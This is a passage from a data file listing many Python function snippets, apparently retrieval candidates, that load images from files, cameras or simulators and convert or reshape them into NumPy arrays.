Convert the raw images from the data-files to floating-points.\n #raw_float = np.array(raw, dtype=float) / 255.0\n\n # Reshape the array to 4-dimensions.\n images = raw.reshape([-1, num_channels, img_size, img_size])\n\n # Reorder the indices of the array.\n images = images.transpose([0, 2, 3, 1])\n\n return images", "def extract_data(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images * NUM_CHANNELS)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH\n data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS)\n return data", "def extract_data(filename,norm_shift=False,norm_scale=True,tag=1):\n print('Extracting',filename)\n data = extractdb_images(filename,tag)\n\n if norm_shift:\n data = data-(PIXEL_DEPTH/2.0)\n if norm_scale:\n data = data/PIXEL_DEPTH\n\n num = data.shape[0]\n data = np.reshape(data,[num,-1])\n # print(data.shape) #(2304,4096) #(576,4096)\n\n return data", "def extract_images(filename):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, filename))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def convert_to_numpy(color_frame, aligned_depth_frame):\n depth_image = np.asanyarray(aligned_depth_frame.get_data())\n frame = np.asanyarray(color_frame.get_data())\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n return frame, depth_image", "def imageToArray(i):\r\n a=gdalnumeric.numpy.fromstring(i.tostring(),'b')\r\n a.shape=i.im.size[1], i.im.size[0]\r\n return a", "def raw_image(self):\n return self.data16.transpose()", "def tile_images(image_stack):\n assert len(image_stack.shape) == 4\n image_list = [image_stack[i, :, :, :] for i in range(image_stack.shape[0])]\n tiled_images = np.concatenate(image_list, axis=1)\n return tiled_images", "def create_images_as_numpy(idx, out_dir, model_outs, K):\n masks = model_outs['pis'].exp()\n sub_images = model_outs['x_loc']\n\n images = []\n all_masks = []\n all_subis = []\n for i in range(K):\n images += [masks[i,0] * sub_images[i,0]]\n all_masks += [masks[i,0]]\n all_subis += [sub_images[i,0]]\n\n images = torch.stack(images)\n all_masks = torch.stack(all_masks)\n all_subis = torch.stack(all_subis)\n whole_image = images.sum(0)\n\n all_masks_grid = torchvision.utils.make_grid(all_masks, nrow=K)\n all_subis_grid = torchvision.utils.make_grid(all_subis, nrow=K)\n all_images_grid = torchvision.utils.make_grid(images, nrow=K)\n \n filepath = out_dir / f'whole_image_{idx}'\n np.save(filepath, whole_image.data.cpu().numpy())\n filepath = out_dir / f'all_images_{idx}'\n np.save(filepath, all_images_grid.data.cpu().numpy())\n filepath = out_dir / f'masks_{idx}'\n np.save(filepath, all_masks_grid.data.cpu().numpy())\n filepath = out_dir / f'sub_images_{idx}'\n np.save(filepath, all_subis_grid.data.cpu().numpy())", "def get_pixel_list(img):\n orig_shape = img.shape # Remember the original shape of the img.\n # Store the img as a x by z array (z being the length of the colour space)\n # Essentially just a list of pixels.\n\n if len(img.shape) == 3:\n img = img.reshape(img.shape[0] * img.shape[1], img.shape[2])\n elif len(img.shape) == 2:\n img = img.reshape(img.shape[0] * img.shape[1],)\n return orig_shape, img", "def get_image(self):\n image = np.frombuffer(self.image, dtype=np.uint8)\n return image.reshape(*self.size, self.channels)", "def _extract_array(tiffs: list[np.ndarray], idx: int, shape: tuple[int, ...], dtype: type | np.dtype) -> np.ndarray:\n feature_arrays = (np.atleast_3d(img)[..., idx] for img in tiffs)\n return np.asarray(list(feature_arrays), dtype=dtype).reshape(*shape, 1)", "def image2array(im):\n\n arr = numpy.zeros(im.size)\n\n for x in xrange(im.size[0]):\n for y in xrange(im.size[1]):\n arr[x,y] = im.getpixel((x,y))\n\n return arr", "def get_image():\n image_response = client.simGetImages([airsim.ImageRequest(\"0\", airsim.ImageType.Scene, False, False)])[0]\n image1d = np.fromstring(image_response.image_data_uint8, dtype=np.uint8)\n image_rgba = image1d.reshape(image_response.height, image_response.width, 4)\n return image_rgba[78:144,1:255,0:3].astype(float)\n # return image_rgba[78:144,76:255,0:3].astype(float)", "def get_raw(self) -> bytearray:\n img_bytes = bytearray()\n for i in range(self.grid_size[0]):\n if self.grid[i] is not None:\n for j in range(self.grid_size[1]):\n if self.grid[i][j] is not None:\n color = self.grid[i][j]\n color = color.get_byte_representation()\n for k in range(len(color)):\n img_bytes.append(color[k])\n return img_bytes", "def getByteArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def DEPTH(frame):\n\tdepth = np.empty(( 240, 320, 1 ), np.uint16)\n\tframe.image.copy_bits( depth.ctypes.data )\n\tcv2.imshow( 'VideoDEPTH', depth )", "def view_image(train_dataloader):\n for (x, target) in train_dataloader:\n np.save(\"img.npy\", x)\n print(x.shape)\n exit(0)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %(magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = numpy.frombuffer(buf, dtype=numpy.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def read(self, index):\n assert type(index) is int\n img = self.db.get_node('/images/img{:04d}'.format(index))\n return np.array(img)", "def extract_images(f):\n print('Extracting', f.name)\n with gzip.GzipFile(fileobj=f) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError('Invalid magic number %d in MNIST image file: %s' %\n (magic, f.name))\n num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def r2n2_xyz_images(self):\n if not hasattr(self, '_r2n2_xyz_images'):\n xyz_images = []\n for i in range(24):\n im_i = geom_util_np.apply_4x4(\n self.r2n2_cam_images[i, ...],\n self.r2n2_cam2world[i, ...],\n are_points=True)\n mask = np_util.make_mask(self.r2n2_depth_images[i, ...])\n xyz_images.append(np_util.zero_by_mask(mask, im_i).astype(np.float32))\n self._r2n2_xyz_images = np.stack(xyz_images)\n return self._r2n2_xyz_images", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def image(self):\n return self.pixels.get_array()", "def prepare_data(data):\n\n image_array = np.zeros(shape=(len(data), 48, 48))\n image_label = np.array(list(map(int, data['emotion'])))\n\n for i, row in enumerate(data.index):\n image = np.fromstring(data.loc[row, 'pixels'], dtype=int, sep=' ')\n image = np.reshape(image, (48, 48))\n\n image = face_detection(image.astype(np.uint8))\n\n image_array[i] = image\n\n return image_array, image_label", "def cut4(image):\r\n i, j = image.shape\r\n a1 = image[:i // 2, :j // 2]\r\n a2 = image[i // 2:, :j // 2]\r\n a3 = image[:i // 2, j // 2:]\r\n a4 = image[i // 2:, j // 2:]\r\n return a1, a2, a3, a4", "def find_pixels(self):\n ref_image=Image.open('sample0000.png')\n imarray=np.array(ref_image)\n ref_image.close()\n self.number_of_pix=imarray.shape\n print self.number_of_pix\n ref_image=None\n imarray=None", "def get_4d(slice, copylayers=[], transparancy=0):\n assert slice.ndim < 3\n img = np.zeros(slice.shape)\n img = img[:, :, np.newaxis]\n img = np.repeat(img, 4, 2)\n transparancy = 255 - (255 * transparancy)\n img[:, :, -1] = transparancy\n for layer in copylayers:\n img[:, :, layer] = slice\n return(img)", "def extract_images(f):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2051:\n\t\t\traise ValueError('Invalid magic number %d in MNIST image file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_images = _read32(bytestream)\n\t\trows = _read32(bytestream)\n\t\tcols = _read32(bytestream)\n\t\tbuf = bytestream.read(rows * cols * num_images)\n\t\tdata = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tdata = data.reshape(num_images, rows, cols, 1)\n\t\treturn data", "def get_images(path_list):\n images = []\n labels = []\n names = []\n i = 0\n for path in path_list:\n for fruit_dir_path in glob.glob(path):\n fruit_label = fruit_dir_path.split(\"/\")[-1]\n for image_path in glob.glob(os.path.join(fruit_dir_path, \"*.jpg\")):\n image = cv2.imread(image_path, cv2.IMREAD_COLOR)\n\n image = cv2.resize(image, (45, 45))\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n images.append(image)\n names.append(fruit_label)\n labels.append(i)\n i += 1\n\n images = np.array(images)\n print(images.shape)\n # add a new dimension here\n with np.nditer(images, op_flags=['readwrite']) as it:\n for x in it:\n x = np.expand_dims(x, axis=0)\n labels = np.array(labels)\n return images, labels, i", "def convert_3d(points_2d, depth_image, image):\n fx = 525.0 # focal length x\n fy = 525.0 # focal length y\n cx = 319.5 # optical center x\n cy = 239.5 # optical center y\n factor = 5000 # for the 16-bit PNG files\n points_3d = []\n cols = []\n colors = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n for v in range(depth_image.shape[0]):\n for u in range(depth_image.shape[1]):\n Z = depth_image[v,u] / factor\n X = (u - cx) * Z / fx\n Y = (v - cy) * Z / fy\n points_3d.append([X,Y,Z])\n cols.append(colors[v,u])\n points = []\n for i in range(len(points_2d)):\n x = int(points_2d[i,0])\n y = int(points_2d[i,1])\n # print(y)\n Z = depth_image[y,x] / factor\n X = (x - cx) * Z / fx\n Y = (y - cy) * Z / fy\n points.append([X,Y,Z])\n points_3d = np.array(points_3d)\n cols = np.array(cols)\n points = np.array(points)\n \n return points, points_3d, cols", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def reshape_pixel_array(self, pixel_arr):\n reshaped_pixel_arr = []\n n = 28\n while n <= len(pixel_arr):\n reshaped_pixel_arr.append(pixel_arr[n-28:n])\n n+=28\n\n return reshaped_pixel_arr", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def get_image_array_from_example(example):\n features = example.features.feature\n img = features['image/encoded'].bytes_list.value[0]\n shape = features['image/shape'].int64_list.value[0:3]\n return np.frombuffer(img, np.uint8).reshape(shape)", "def reconstructImage(self,arr):\n\t\tarr = arr * 256\n\t\tarr = np.array(np.round(arr),dtype=np.uint8)\n\t\t#arr = np.array(arr,dtype=np.uint8)\n\n\t\t# We need to transpose the array because we flatten X by columns\n\t\t#arr = arr.T\n\t\t#a = arr.reshape((self.width, self.height,3))\n\t\t\n\t\tif self.mode == 'L':\n\t\t\ta = arr.reshape((self.width, self.height))\n\t\telse:\n\t\t\ta = arr.reshape((self.width, self.height,3))\n\n\t\t#a = arr.reshape((3,self.width, self.height))\t\t\n\t\t#a = arr.transpose(0, 3, 1, 2)\n\n\t\tim = Image.fromarray(a,mode=self.mode)\n\n\t\treturn im", "def imread(filename):\n return np.asarray(Image.open(filename), dtype=np.uint8)[..., :3]", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def imagefile_to_array(imagefname):\n with Image.open(imagefname) as image: \n im_arr = np.fromstring(image.tobytes(), dtype=np.uint8)\n rows = image.size[1]\n cols = image.size[0]\n no_channels = int(len(im_arr)/rows/cols)\n im_arr = im_arr.reshape((rows, cols, no_channels))\n im_arr = np.rollaxis(im_arr,-1)\n return im_arr", "def get_img():\n\timg = camera.Capture()\n\tarray = jetson.utils.cudaToNumpy(img)\n\n\treturn(array)", "def img2np_pillow(filename):\n with Image.open(filename) as image:\n nparr = np.fromstring(image.tobytes(), dtype=np.uint8)\n nparr = im_arr.reshape((image.size[1], image.size[0], 3))\n return nparr", "def get_image(filepath,size):\n image = Image.open(filepath)\n newimage = image.resize((size,size)).convert('LA')\n pixels = np.asarray(newimage,dtype = np.float32)[:,:,0]\n return pixels", "def np_image_matrix(self):\n return np.array(self.crop_image())", "def extract_data(filename, num_images, starting_id, context_factor):\n imgs = []\n for i in range(starting_id, num_images+starting_id):\n imageid = \"satImage_%.3d\" % i\n image_filename = filename + imageid + \".png\"\n if os.path.isfile(image_filename):\n print ('Loading ' + image_filename)\n img = mpimg.imread(image_filename)\n\n\n imgs.append(img)\n else:\n print ('File ' + image_filename + ' does not exist')\n\n num_images = len(imgs)\n IMG_WIDTH = int(imgs[0].shape[0]/DOWNSCALE)\n IMG_HEIGHT = int(imgs[0].shape[1]/DOWNSCALE)\n N_PATCHES_PER_IMAGE = (IMG_WIDTH/IMG_PATCH_SIZE)*(IMG_HEIGHT/IMG_PATCH_SIZE)\n\n\n img_patches = [img_crop_context(imgs[i], IMG_PATCH_SIZE, IMG_PATCH_SIZE,context_factor, sub_mean=True) for i in range(num_images)]\n data = [img_patches[i][j] for i in range(len(img_patches)) for j in range(len(img_patches[i]))]\n data = np.asarray(data)\n return data", "def get_image(image_path):\r\n image = Image.open(image_path, 'r')\r\n width, height = image.size\r\n pixel_values = list(image.getdata())\r\n if image.mode == 'RGB':\r\n channels = 3\r\n elif image.mode == 'L':\r\n channels = 1\r\n else:\r\n print(\"Unknown mode: %s\" % image.mode)\r\n return None\r\n pixel_values = np.array(pixel_values).reshape((1,width, height, channels))\r\n # print(pixel_values.shape)\r\n return pixel_values", "def extract_4_pics(im_rgb, im):\r\n _, w = im.shape\r\n \r\n # Find indices of the longest horizontal and vertical lines\r\n hor_indices, ver_indices, _, _ = find_longest_lines(im)\r\n\r\n # Find the 4 longest horizontal lines\r\n hor_indices = np.sort(hor_indices[:8])\r\n hor_lines = np.array([hor_indices[0], 0, 0, 0])\r\n \r\n # line 2-4\r\n cur = 0;\r\n thresholds = [0.42*w, w/50];\r\n for i in range(cur,8):\r\n if hor_indices[i] - hor_lines[cur] > thresholds[cur%2]:\r\n cur += 1;\r\n hor_lines[cur] = hor_indices[i];\r\n if cur == 3:\r\n break\r\n \r\n # vertical lines\r\n ver_indices = np.sort(ver_indices[:8]);\r\n ver_lines = np.array([ver_indices[0], 0,0,0]);\r\n \r\n # line 2-4\r\n cur = 0;\r\n for i in range(cur, 8):\r\n if ver_indices[i] - ver_lines[cur] > thresholds[cur%2]:\r\n cur += 1;\r\n ver_lines[cur] = ver_indices[i];\r\n if cur == 3:\r\n break\r\n \r\n im[:,ver_lines] = 255\r\n im[hor_lines,:] = 255\r\n \r\n # Extract images\r\n pic1 = im_rgb[hor_lines[0]:hor_lines[1], ver_lines[0]:ver_lines[1], :]\r\n pic2 = im_rgb[hor_lines[0]:hor_lines[1], ver_lines[2]:ver_lines[3], :]\r\n pic3 = im_rgb[hor_lines[2]:hor_lines[3], ver_lines[0]:ver_lines[1], :]\r\n pic4 = im_rgb[hor_lines[2]:hor_lines[3], ver_lines[2]:ver_lines[3], :]\r\n pics = [pic1, pic2, pic3, pic4]\r\n \r\n return pics", "def get_rendered_image(self) -> np.ndarray:\n return np.transpose(self.state['observation'], [1, 2, 0])", "def img_to_array(img, path=True):\n global width, height\n\n if path:\n img = Image.open(img)\n img_arr = np.array(img) / 255.0\n img_arr = img_arr.reshape(width, height, channels)\n \n return img_arr", "def slice_array():\n img = Image.open(\"flamingo.jpg\")\n image_as_array = np.array(img)\n width, height, depth = image_as_array.shape\n\n red_channel = image_as_array[:, :, 0]\n green_channel = image_as_array[:, :, 1]\n blue_channel = image_as_array[:, :, 2]\n\n top_left_corner = image_as_array[:height // 2, :width // 2, :]\n top_right_corner = image_as_array[:height // 2, width // 2:, :]\n random_middle_pixels = image_as_array[11:29, 101:400, :]", "def to_image_space(data):\n return np.swapaxes(np.flip(data, 1), 0, 1)", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def _extract_data_sub_stack(self, startRow, endRow):\n # Grab the shape of the image stack\n nz, ny, nx = self.shape\n\n # Compute the number of rows in this sub stack\n numberOfRows = endRow - startRow\n\n # Build an array for storing output\n outData = np.zeros((nz, numberOfRows, nx))\n\n # Loop through each image and extract its data\n for zInd, img in enumerate(self.imageList):\n outData[zInd, :, :] = img.data[startRow:endRow, :]\n\n return np.ma.array(outData)", "def tiffread(fname):\n from PIL import Image\n img = Image.open(fname)\n \n res = []\n offsets = []\n frame = 0\n try:\n for frame in itertools.count():\n img.seek(frame)\n aux = np.asarray(img)\n if aux.ndim == 0:\n if img.mode == 'I;16':\n aux = np.fromstring(img.tostring(), np.uint16)\n aux = np.reshape(aux, img.size[::-1])\n elif img.mode == 'I;16S':\n aux = np.fromstring(img.tostring(), np.int16)\n aux = np.reshape(aux, img.size[::-1])\n else:\n raise ValueError, \"unknown pixel mode\"\n res.append(aux)\n except EOFError:\n pass\n \n return np.asarray(res)", "def concat_images(X):\n nc,h,w,_ = X.shape\n X = X.reshape(nc,h,w)\n n = np.ceil(np.sqrt(nc)).astype(\"int8\")\n img = np.zeros((n*w,n*h))\n x = 0\n y = 0\n for example in range(nc):\n img[x*w:(x+1)*w,y*h:(y+1)*h] = X[example]\n y += 1\n if y >= n:\n y = 0\n x += 1\n return img", "def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def flatten_pixcoord(image):\n hdr = pyfits.getheader(image)\n naxis1 = hdr['naxis1']\n naxis2 = hdr['naxis2']\n pixcoord = np.mgrid[1:naxis1+1,1:naxis2+1]\n pixcoord = pixcoord.swapaxes(0,1).swapaxes(1,2)\n pixcoord = pixcoord.ravel().reshape(naxis1*naxis2, 2)\n return pixcoord", "def features_to_np_array(self, images):\n \n images = list(images)\n \n images = np.stack(images, axis=0)\n \n return images", "def pngxy(data):\n ihdr = data.index(b'IHDR')\n # next 8 bytes are width/height\n w4h4 = data[ihdr+4:ihdr+12]\n return struct.unpack('>ii', w4h4)", "def arr(img_arr, img_wid, img_hei):\n X = torch.Tensor(img_arr).view(-1, 1, img_wid, img_hei)\n X = X/255.0\n return X", "def __readImages(self, filename):\n print 'Reading images from %s ...' % filename\n images = []\n with open(filename, 'rb') as infile:\n infile.read(4) # ignore magic number\n count = struct.unpack('>i', infile.read(4))[0]\n rows = struct.unpack('>i', infile.read(4))[0]\n columns = struct.unpack('>i', infile.read(4))[0]\n\n for i in xrange(count):\n data = infile.read(rows*columns)\n image = np.fromstring(data, dtype=np.uint8)\n image = image.reshape((rows, columns))\n image = 255 - image # now black digit on white background\n images.append(image)\n return images", "def _colored_img_to_arr(image, verbose=False):\n height, width = image.size\n arr = np.array(image.getdata())\n arr = arr.reshape(3, height, width)\n r = arr[0]\n g = arr[1]\n b = arr[2]\n return r, g, b", "def imagesMatrix(path,imageSize = 10304,byteorder = '>'):\n listing = os.listdir(path)\n listing.sort()\n count = 0\n docFiles = []\n for infile in listing:\n count = count + 1\n docFiles.append(infile)\n matrix = np.zeros((imageSize,count))\n for i in range(len(listing)):\n matrix[:,i]=np.asarray(read_pgm(join(path,listing[i]),byteorder)).reshape(-1)\n return matrix,listing", "def images16(self, first, last, shape, validfirst, validlast):\n size = shape[0] * shape[1] * (1 + last - first)\n array = np.ascontiguousarray(np.zeros(size, dtype=np.int16))\n self.lib.GetImages16(ct.c_long(first), ct.c_long(last),\n array.ctypes.data_as(ct.POINTER(ct.c_int16)),\n ct.c_ulong(size),\n ct.pointer(ct.c_long(validfirst)),\n ct.pointer(ct.c_long(validlast)))\n\n return array.reshape(-1, shape[0], shape[1])", "def image_decoder(rawbytes):\n img = Image.open(BytesIO(rawbytes))\n array = np.asarray(img, dtype=np.uint8)\n return array", "def debug_image(self, state_index: int = -1):\n image = self.make_image(state_index, channel_type=\"n\")\n return np.array([np.sum(arr) for arr in image])[3:].reshape(8, 12)", "def create_array_from_rgb_layers(vk4_container, layer_list):\n log.debug(\"Entering create_array_from_rgb_layers\")\n width = vk4_container.image_width\n height = vk4_container.image_height\n\n new_array = np.zeros(((width * height), 3), dtype=np.uint8)\n for layer in layer_list:\n i = 0\n for rgb in layer:\n new_array[i][0] += rgb[0]\n new_array[i][1] += rgb[1]\n new_array[i][2] += rgb[2]\n i = i + 1\n log.debug(\"In create_array_from_rgb_layers()\\n\\tArray for rgb image \" \\\n \"output:\\n{}\".format(new_array))\n log.debug(\"Exiting create_array_from_rgb_layers\")\n\n return new_array", "def getimgs():", "def get_image_array(self):\n with picamera.array.PiRGBArray(self.camera) as output:\n self.camera.resolution = (640, 480)\n self.camera.capture(output, 'rgb')\n logging.info(\"Captured image of size {0}x{1}x{2}\".format(\n output.array.shape[0], output.array.shape[1], output.array.shape[2]))\n output.truncate(0)\n return output.array\n # self.camera.capture_continuous(self.stream, format='jpeg', use_video_port=True)\n # self.stream.seek(0)\n # image = Image.open(self.stream).convert('RGB').resize((self._input_width, self._input_height), Image.ANTIALIAS)\n # self.stream.seek(0)\n # self.stream.truncate()\n # self.camera.close()", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X = []\n y = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y.append(label)\n X.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except ValueError:\n continue\n return X,y", "def stack_images( path, num_frames=50 ):\n # read in the frames\n frames = []\n for i in xrange( 100, 100+num_frames ):\n f = path + str(i) + \".pix\"\n frames.append( pix2array(f) )\n # append the z values to each frame in the sequence\n for i,x in enumerate( frames ):\n tmp = numpy.empty( (x.shape[0], 1), dtype=numpy.int )\n tmp.fill( i )\n frames[i] = numpy.hstack( (x, tmp) )\n return numpy.vstack( frames )", "def get_np_image(self, save_image=False, filename=\"curr_image.png\"):\n responses = client.simGetImages([airsim.ImageRequest(\"front_left\", airsim.ImageType.Scene, False, False)])\n response = responses[0]\n\n # get numpy array\n img1d = np.fromstring(response.image_data_uint8, dtype=np.uint8)\n\n # reshape array to 4 channel image array H X W X 4\n img_rgb = img1d.reshape(response.height, response.width, 3)\n\n # # original image is fliped vertically\n # img_rgb = np.flipud(img_rgb)\n\n if save_image:\n cv2.imwrite(filename, img_rgb)\n\n return img_rgb", "def convert_images_from_uint8(images, drange=[-1,1], nhwc_to_nchw=False):\n if nhwc_to_nchw:\n imgs_roll=np.rollaxis(images, 3, 1)\n return imgs_roll/ 255 *(drange[1] - drange[0])+ drange[0]", "def array_from_img(image):\n return np.array(image)", "def pack_images(images, rows, cols):\n shape = tf.shape(images)\n width = shape[-3]\n height = shape[-2]\n depth = shape[-1]\n images = tf.reshape(images, (-1, width, height, depth))\n batch = tf.shape(images)[0]\n rows = tf.minimum(rows, batch)\n cols = tf.minimum(batch // rows, cols)\n images = images[:rows * cols]\n images = tf.reshape(images, (rows, cols, width, height, depth))\n images = tf.transpose(images, [0, 2, 1, 3, 4])\n images = tf.reshape(images, [1, rows * width, cols * height, depth])\n return images", "def snapshot2(self) -> np.array:\n fbo = self.fbo\n data = fbo.read(components=3, dtype='f4')\n w, h = self.size\n return np.flipud(np.frombuffer(data, dtype='f4').reshape((h, w, 3)))", "def expand_images(X):\n\n X_ex = np.empty((X.shape[0] * X.shape[1], X.shape[2])) * np.nan\n\n for n in range(0, X.shape[2]):\n X_ex[:,n] = X[:,:,n].flatten()\n\n return X_ex", "def extract_data(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(16)\n buf = bytestream.read(28 * 28 * 10000 * 1)\n data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)\n data = (data - (255 / 2.0)) / 255\n data = data.reshape(10000, 28, 28, 1)\n return data", "def nb_read_data(data_chunk):\n\t#ensure that the data_chunk has the right length\n\tprint(data_chunk.shape)\n\tassert np.mod(data_chunk.shape[0],3)==0\n\n\tout=np.empty(data_chunk.shape[0]//3*2,dtype=np.uint16)\n\timage1 = np.empty((2048,2048),dtype=np.uint16)\n\timage2 = np.empty((2048,2048),dtype=np.uint16)\n\n\tfor i in nb.prange(data_chunk.shape[0]//3):\n\t\tfst_uint8=np.uint16(data_chunk[i*3])\n\t\tmid_uint8=np.uint16(data_chunk[i*3+1])\n\t\tlst_uint8=np.uint16(data_chunk[i*3+2])\n\n\t\tout[i*2] = (fst_uint8 << 4) + (mid_uint8 >> 4)\n\t\tout[i*2+1] = ((mid_uint8 % 16) << 8) + lst_uint8\n\n\treturn out", "def fits_to_nparray(file):\n hdu_list = fits.open(file)\n image_data = hdu_list[0].data\n image_data=image_data.astype(np.uint16)\n \n gdal_array.SaveArray(image_data, file[:-5]+\".tif\")\n \n return image_data", "def getimg(filename):\n return np.asarray(Image.open('imgdb/'+filename))", "def toNpArray(row):\n image = row[0]\n height = image.height\n width = image.width\n nChannels = image.nChannels\n\n return np.ndarray(\n shape=(height, width, nChannels),\n dtype=np.uint8,\n buffer=image.data,\n strides=(width * nChannels, nChannels, 1))", "def create_image_array(files_list):\n im_array = np.array([np.array(cv2.imread(file)) for file in files_list])\n return im_array" ]
